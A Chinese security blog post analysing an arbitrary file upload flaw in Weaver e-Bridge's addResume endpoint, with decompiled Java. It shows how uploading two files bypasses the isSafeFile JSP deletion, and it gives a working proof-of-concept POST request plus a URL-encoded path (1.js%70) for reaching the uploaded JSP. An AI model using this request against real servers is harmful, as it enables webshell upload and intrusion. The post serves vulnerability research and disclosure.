泛微云桥e-Bridge addResume 任意文件上传漏洞分析

admin 2024年8月12日16:00:07评论43 views字数 6616阅读22分3秒阅读模式

环境搭建

https://wxdownload.e-cology.com.cn/ebridge/ebridge_install_win64_server2008R2_20200819.zip

下载Windows版本的泛微云桥e-Bridge,解压后目录结构

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

第一次运行后需要打补丁

https://wxdownload.e-cology.com.cn/ebridge/ebridge_patch_20230724.zip

解压文件,得到一个“ROOT”文件夹,直接覆盖到自己泛微云桥目录即可

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

具体启动参考泛微云桥windows版安装说明.txt ,当前版本:20230724SP2

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

漏洞分析

漏洞处:webappsROOTWEB-INFclassesweaverweixinapprecruitcontrollerResumeController.class

  @ActionKey("/wxclient/app/recruit/resume/addResume")
@Before({Tx.class})
public void addResume() throws Exception {
try {
WxBaseFile wbFile = null;
if (getContentType().toLowerCase().startsWith("multipart/form-data"))
wbFile = getWxBaseFile(this.wxBaseFileService, getPara("fileElementId"), null, 2097152, null);
ResumeModel model = (ResumeModel)getModel(ResumeModel.class, "resume");
if (wbFile != null)
model.set("accessory", wbFile.getId());
if (this.resumeService.addResume(model, getPara("sysagentid"))) {
renderJsonMsgForIE(", true);
} else {
renderJsonMsgForIE("
, false);
}
} catch (Exception e) {
if (e.getMessage().indexOf("2097152") != -1) {
renderJsonMsgForIE(", false);
} else {
this.log.error(e.getMessage(), e);
renderJsonMsgForIE("
, false);
}
throw e;
}

}

getWxBaseFile方法

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

String _filePath = StrKit.isBlank(filePath) ? FileUploadTools.getRandomFilePath() : filePath;

int _fileMaxSize = fileMaxSize == -1 ? FileUploadTools.getMaxSize() : fileMaxSize;

String _fileEncoding = StrKit.isBlank(fileEncoding) ? FileUploadTools.getEncoding() : fileEncoding;

1、 filePath 为 null、空字符串或只包含空格,则使用 FileUploadTools.getRandomFilePath() 生成一个随机文件路径。
2、 fileMaxSize 等于 -1,则使用 FileUploadTools.getMaxSize() 获取最大文件大小(默认为 20MB)。
3、 fileEncoding 为 null、空字符串或只包含空格,则使用 FileUploadTools.getEncoding() 获取文件编码(默认为 "UTF-8")。

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

   public static String initFilePath(String prePath) {
StringBuffer sb = new StringBuffer();
if (GCONST.getFileRootPath() != null && !"".equals(GCONST.getFileRootPath())) {
sb.append(GCONST.getFileRootPath());
} else {
sb.append(PathKit.getWebRootPath() + File.separator + "upload");
}

if (StrKit.notBlank(prePath)) {
sb.append(File.separator + prePath + File.separator + sdf.format(new Date()));
} else {
sb.append(File.separator + sdf.format(new Date()));
}

sb.append(File.separator + getUpEng());
return sb.toString();
}

public static String getUpEng() {
Random r = new Random();
char c = (char)(r.nextInt(26) + 65);
char b = (char)(r.nextInt(26) + 65);
return String.valueOf(c) + String.valueOf(b);
}

initFilePath方法初始化并返回一个文件路径字符串。它接受一个可选的前缀路径参数 prePath。如果 prePath 为 null 或空字符串,则使用默认前缀。

getUpEng() 方法生成的随机两字母字符串附加到路径末尾,如:/upload/202408/AB

jfinal框架 UploadFile.getFile

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

UploadFile uf = null;uf = this.getFile(parameterName, _filePath, _fileMaxSize, _fileEncoding);

this.getFile 实现使用了jfinal框架的上传方法

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

根据Jfinal框架文档,getFile文件上传最后实现的方法wrapMultipartRequest

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

在80行代码中,if判断了isSafeFile

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

isSafeFile

在isSafeFile 方法中,传入的文件名如果是jsp后缀的,就会执行 delete() 将上传的jsp文件删除

   private boolean isSafeFile(UploadFile uploadFile) {
if (uploadFile.getFileName().toLowerCase().endsWith(".jsp")) {
uploadFile.getFile().delete();
return false;
} else {
return true;
}
}

MultipartRequest 代码

从wrapMultipartRequest 方法中,发现将文件流传入的new com.oreilly.servlet.MultipartRequest

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

public MultipartRequest(HttpServletRequest request, String saveDirectory, int maxPostSize, String encoding, FileRenamePolicy policy) throws IOException {
this.parameters = new Hashtable();
this.files = new Hashtable();
if (request == null) {
throw new IllegalArgumentException("request cannot be null");
} else if (saveDirectory == null) {
throw new IllegalArgumentException("saveDirectory cannot be null");
} else if (maxPostSize <= 0) {
throw new IllegalArgumentException("maxPostSize must be positive");
} else {
File dir = new File(saveDirectory);
if (!dir.isDirectory()) {
throw new IllegalArgumentException("Not a directory: " + saveDirectory);
} else if (!dir.canWrite()) {
throw new IllegalArgumentException("Not writable: " + saveDirectory);
} else {
MultipartParser parser = new MultipartParser(request, maxPostSize, true, true, encoding);
Vector existingValues;
if (request.getQueryString() != null) {
Hashtable queryParameters = HttpUtils.parseQueryString(request.getQueryString());
Enumeration queryParameterNames = queryParameters.keys();

while(queryParameterNames.hasMoreElements()) {
Object paramName = queryParameterNames.nextElement();
String[] values = (String[])((String[])queryParameters.get(paramName));
existingValues = new Vector();

for(int i = 0; i < values.length; ++i) {
existingValues.add(values[i]);
}

this.parameters.put(paramName, existingValues);
}
}

Part part;
while((part = parser.readNextPart()) != null) {
String name = part.getName();
if (name == null) {
throw new IOException("Malformed input: parameter name missing (known Opera 7 bug)");
}

String fileName;
if (part.isParam()) {
ParamPart paramPart = (ParamPart)part;
fileName = paramPart.getStringValue();
existingValues = (Vector)this.parameters.get(name);
if (existingValues == null) {
existingValues = new Vector();
this.parameters.put(name, existingValues);
}

existingValues.addElement(fileName);
} else if (part.isFile()) {
FilePart filePart = (FilePart)part;
fileName = filePart.getFileName();
if (fileName != null) {
filePart.setRenamePolicy(policy);
filePart.writeTo(dir);
this.files.put(name, new UploadedFile(dir.toString(), filePart.getFileName(), fileName, filePart.getContentType()));
} else {
this.files.put(name, new UploadedFile((String)null, (String)null, (String)null, (String)null));
}
}
}

}
}
}

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

这个部分代码处理了文件上传,将文件保存在指定目录中

      FilePart filePart = (FilePart)part;
                 fileName = filePart.getFileName();
                 if (fileName != null) {
                    filePart.setRenamePolicy(policy);
                    filePart.writeTo(dir);
                    this.files.put(name, new UploadedFile(dir.toString(), filePart.getFileName(), fileName, filePart.getContentType()));
                } else {
                    this.files.put(name, new UploadedFile((String)null, (String)null, (String)null, (String)null));
                }

主要需要绕过isSafeFile 函数删除jsp文件,可通过双文件上传绕过

漏洞复现

POST /wxclient/app/recruit/resume/addResume?fileElementId=H HTTP/1.1
Host: 127.0.0.1:8088
Content-Length: 361
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryD5Mawpg068t7pbxZ
Content-Disposition: form-data; name="file"; filename="1.jsp"

127
------WebKitFormBoundaryD5Mawpg068t7pbxZ
Content-Disposition: form-data; name="file"; filename="222.jsp"

127
------WebKitFormBoundaryD5Mawpg068t7pbxZ--

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

从文件监控中,通过双文件上传,成功创建了两个文件1.jsp 222.jsp ,只有1.jsp成功上传漏洞,222.jsp被删除了

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

使用url编码绕过jsp限制

访问:http://127.0.0.1:8088/upload/202408/RE/1.js%70

泛微云桥e-Bridge addResume 任意文件上传漏洞分析

回复 “ 加群 ” 加入微信交流群

原文始发于微信公众号(安全逐梦人):泛微云桥e-Bridge addResume 任意文件上传漏洞分析

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月12日16:00:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微云桥e-Bridge addResume 任意文件上传漏洞分析http://cn-sec.com/archives/3059002.html

发表评论

匿名网友 填写信息